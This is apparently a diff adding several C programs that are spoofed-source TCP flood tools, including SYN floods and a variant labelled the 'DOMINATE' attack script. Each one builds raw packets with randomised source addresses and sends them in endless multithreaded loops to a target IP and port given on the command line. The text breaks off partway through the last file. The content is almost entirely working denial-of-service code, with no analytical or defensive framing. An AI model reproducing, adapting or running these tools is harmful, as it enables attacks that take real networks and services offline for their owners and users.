setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
|
||||
tcph->dest = htons(floodport);
|
||||
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
|
||||
int num_threads = atoi(argv[3]);
|
||||
floodport = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[4]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
|
||||
int multiplier = 20;
|
||||
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,205 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(5678);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = rand();
|
||||
tcph->res2 = rand();
|
||||
tcph->doff = 5;
|
||||
tcph->syn = rand();
|
||||
tcph->fin = rand();
|
||||
tcph->psh = rand();
|
||||
tcph->ack = rand();
|
||||
tcph->urg = rand();
|
||||
tcph->rst = rand();
|
||||
tcph->window = rand();
|
||||
tcph->check = rand();
|
||||
tcph->urg_ptr = rand();
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = rand();
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
tcph->dest = rand();
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 5){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s [IP] [threads] [limiter] [time]\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fprintf(stdout, "Opening threads...\n");
|
||||
int num_threads = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[3]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
int multiplier = 100;
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, "Sending packets..\n");
|
||||
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,198 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
static unsigned int floodport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(5678);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = 0;
|
||||
tcph->res2 = 0;
|
||||
tcph->doff = 5;
|
||||
tcph->window = htons(65535);
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(floodport);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
tcph->dest = htons(floodport);
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <port> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
int num_threads = atoi(argv[3]);
|
||||
floodport = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[4]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
int multiplier = 20;
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, "Sending packets...\n");
|
||||
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,197 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <time.h>
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
static unsigned int floodport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
char ip[17];
|
||||
snprintf(ip, sizeof(ip)-1, "%d.%d.%d.%d", rand()%255, rand()%255, rand()%255, rand()%255);
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(rand()%54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr(ip);
|
||||
}
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(rand()%65535);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = 0;
|
||||
tcph->res2 = 1;
|
||||
tcph->doff = 5;
|
||||
tcph->syn = 1;
|
||||
tcph->window = rand();
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(floodport);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
tcph->dest = htons(floodport);
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
tcph->dest = htons(floodport);
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(0));
|
||||
fprintf(stdout, "Tank: So what do you need? Besides a miracle.\nNeo: Packets. Lots of packets.\n");
|
||||
int num_threads = atoi(argv[3]);
|
||||
floodport = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[4]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
int multiplier = 20;
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,221 @@
|
|||
/* "DOMINATE" Attack Script, this script was so difficult to make, it required taking the very public ESSYN
|
||||
attack script, and replacing "tcph->res2 = 1;" to "tcph->res2 = 3;" in the "setup_tcp_header" function.
|
||||
Anybody who purchased this script for $300 BTC, yup, it's literally changing a 1 to a 3.
|
||||
|
||||
Leaked / Made by Andy Quez, A real mexian hero.
|
||||
*/
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
static unsigned int floodport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(5678);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = 0;
|
||||
tcph->res2 = 3;
|
||||
tcph->doff = 5;
|
||||
tcph->syn = 1;
|
||||
tcph->window = htonl(65535);
|
||||
tcph->check = 0;
|
||||
